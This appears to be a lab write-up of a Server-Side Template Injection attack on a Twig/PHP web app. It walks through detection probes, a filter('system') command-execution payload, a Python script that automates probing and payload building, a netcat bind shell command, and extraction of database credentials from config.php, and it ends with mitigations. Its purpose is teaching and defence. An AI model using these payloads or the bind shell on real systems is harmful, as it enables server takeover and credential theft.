Server-Side Template Injection – Remote Code Execution & Data Exposure | Leaf
Overview
This lab demonstrates how Server-Side Template Injection (SSTI) can lead to full server compromise.
The attack chain includes:
- SSTI detection
- Template engine identification
- Remote command execution
- Bind shell access
- Sensitive data extraction
Objective
- Identify SSTI vulnerability
- Determine template engine
- Execute system commands
- Establish shell access
- Extract sensitive information
Reconnaissance
Scan the target for open services:
nmap -sV <target_ip>
Output
┌──(root㉿kali)-[/home/kelvin/Desktop]
└─# nmap -sV 172.20.6.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-29 12:06 -0400
Nmap scan report for 172.20.6.12 (172.20.6.12)
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Debian))
3306/tcp open mysql MySQL (unauthorized)
Nmap done: 1 IP address (1 host up) scanned in 21.37 seconds
Open services:
- Port 80 — HTTP (Apache 2.4.56 on Debian)
- Port 3306 — MySQL. Nmap reports "unauthorized", which means the server answered the probe with a "host is not allowed to connect" error: the scanning host is not permitted to authenticate, so any database credentials found later are only usable from the target itself (or an allowed host) unless the port is tunnelled.
Initial Enumeration
Directory brute-forcing did not reveal useful endpoints:
gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/big.txt
However, the web application allows unauthenticated user comments on products.
SSTI Detection
Test for SSTI using a simple payload:
{{7*7}}
Result
49
The comment is rendered as 49 rather than the literal {{7*7}}, so the submitted text is being compiled and evaluated as template source instead of being inserted as data. That is the defining condition of SSTI.
Template Engine Identification
Test behavior with string multiplication:
{{7*'7'}}
Result
49
Analysis
| Engine | Expected Output |
|---|---|
| Jinja2 | 7777777 |
| Twig | 49 |
Since the result is 49, the application is using Twig. Jinja2 runs on Python, where 7*'7' repeats the string ('7777777'); Twig runs on PHP, where the string '7' is coerced to a number and the product is 49. The composer.json and vendor/ directory seen later in the web root are consistent with a Composer-managed PHP application.
Remote Code Execution via SSTI
Twig's filter filter (available since Twig 2.10) takes the name of a callable and applies it to every element of an array. Outside a sandbox, any PHP function name is accepted, so passing 'system' calls PHP's system() with each array element as the command.
Payload
{{['<command>']|filter('system')}}
This enables execution of arbitrary commands on the server with the privileges of the web server process, and system() writes the command's output into the rendered page, so the result is visible in the response. A single quote or backslash inside the command must be backslash-escaped, or the Twig string literal breaks and the template fails to compile.
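The detection, fingerprinting and payload steps above, automated as a small script. This is an added example written for this page, not code from the lab or the target application. It assumes (nothing on the page states this) that the comment form POSTs to /comment.php with a field named comment and that the submitted comment is reflected on the response page; the classification logic generalises the page's two probes by also treating an unevaluated, echoed-back probe as "no SSTI", and twig_rce_payload() escapes quotes and backslashes so arbitrary commands fit inside the Twig string literal.

```python
"""SSTI probe, template-engine fingerprint and Twig RCE payload builder.

Added example for this page, not code from the lab. Assumptions (not stated on
the page): the comment form is POSTed to /comment.php, the field is named
`comment`, and the submitted comment is reflected on the response page.
"""
import sys
import urllib.parse
import urllib.request

PROBES = {
    # probe                 # what the page observed for each engine
    "arith": "{{7*7}}",     # 49 on any engine that evaluates the expression
    "strmul": "{{7*'7'}}",  # Jinja2: '7777777' (string repeat); Twig: 49 (PHP coerces '7' to 7)
}


def evaluated(body: str, probe: str, expected: str) -> bool:
    """True when the engine computed `expected` and did not just echo the probe back."""
    return expected in body and probe not in body


def classify_engine(arith_body: str, strmul_body: str) -> str:
    """Classify from the two probe responses: 'none', 'twig', 'jinja2' or 'unknown'."""
    if not evaluated(arith_body, PROBES["arith"], "49"):
        return "none"  # arithmetic not evaluated: no SSTI with {{ }} syntax
    if evaluated(strmul_body, PROBES["strmul"], "7777777"):
        return "jinja2"
    if evaluated(strmul_body, PROBES["strmul"], "49"):
        return "twig"
    return "unknown"  # evaluates arithmetic, but neither known string-multiplication result


def twig_rce_payload(command: str) -> str:
    """Build the page's Twig RCE payload for an arbitrary command.

    Twig's lexer runs stripcslashes() on single-quoted string literals, so a
    quote or backslash inside the command has to be backslash-escaped or the
    literal ends early and the template fails to compile.
    """
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    return "{{['" + escaped + "']|filter('system')}}"


def submit_comment(base_url: str, payload: str, field: str = "comment") -> str:
    """POST one comment and return the response body (network; not exercised by the tests)."""
    data = urllib.parse.urlencode({field: payload}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/comment.php", data=data)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://<target_ip>"
    bodies = {name: submit_comment(target, probe) for name, probe in PROBES.items()}
    engine = classify_engine(bodies["arith"], bodies["strmul"])
    print("engine:", engine)
    if engine == "twig":
        print("RCE payload:", twig_rce_payload("id"))
```

Run it as `python3 ssti_probe.py http://<target_ip>`. Checking that the literal probe is absent from the response, not only that 49 is present, avoids a false positive on a page that happens to contain "49" elsewhere and echoes comments back unevaluated.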
Bind Shell Setup
Start a bind shell on the target:
{{['nc -nvlp 1337 -e /bin/bash']|filter('system')}}
Two caveats: the -e flag exists only in netcat builds that support executing a program after connect (netcat-traditional, ncat); the OpenBSD netcat shipped by many distributions does not have it. Also, system() waits for the command to finish, so the HTTP request that submits this comment will hang for as long as the listener is running. Submit it and move on to the connection step without waiting for a response.
Netcat Options
| Flag | Description |
|---|---|
| -l | Listen mode |
| -v | Verbose |
| -n | No DNS resolution |
| -p | Port number |
| -e | Execute the given program after a client connects (here /bin/bash) |
Shell Access
Connect from attacker machine:
nc -nv <target_ip> 1337
Result
(UNKNOWN) [172.20.6.12] 1337 (?) open
ls
Chart.bundle.min.js
blank.png
bootstrap-icons.css
bundle.min.js
comment.php
composer.json
composer.lock
config.php
css
index.php
js
product.php
products
vendor
Sensitive Data Extraction
Inspect configuration file:
cat config.php
Output
$host = "localhost";
$dbname = "modish_tech";
$username = "root";
$password = "7tRy-zSmF-1143";
Proof of Exploitation
- SSTI vulnerability identified
- Template engine confirmed as Twig
- Remote command execution achieved
- Bind shell established
- Sensitive database credentials extracted
Attack Chain Summary
- Service enumeration (Nmap)
- Identify input point (comments)
- SSTI detection ({{7*7}})
- Template engine fingerprinting (Twig)
- Command execution via SSTI
- Bind shell creation (Netcat)
- Remote shell access
- Credential extraction (config.php)
Impact
- Remote Code Execution (RCE)
- Full server access via shell
- Exposure of database credentials
- Potential database compromise
- High risk of complete system takeover
Mitigation
- Never compile user input as template source (for example with Twig's createTemplate()); pass it to a fixed template as a variable so that it is treated as data and auto-escaped
- Use safe template rendering practices and keep the template engine up to date
- Run user-facing templates in a sandboxed environment (Twig's SandboxExtension) with an allow-list of tags, filters and functions, so that callables such as system are not reachable from a template
- Apply strict input validation and output escaping
- Run the web server with least privilege and keep database credentials out of the web root (or at least unreadable to other users)
- Restrict inbound and outbound network access from the web server so a listener such as the bind shell above cannot be reached
Real-World Insight
SSTI is one of the most dangerous web vulnerabilities because it directly leads to server-side execution.
Common exploitation path:
Input field → SSTI → RCE → Shell → Data exfiltration
Unlike client-side issues, SSTI gives attackers control over the backend itself.
Always test:
- {{7*7}}
- {{7*'7'}}
- Template-specific payloads
A single overlooked input field can lead to full infrastructure compromise.
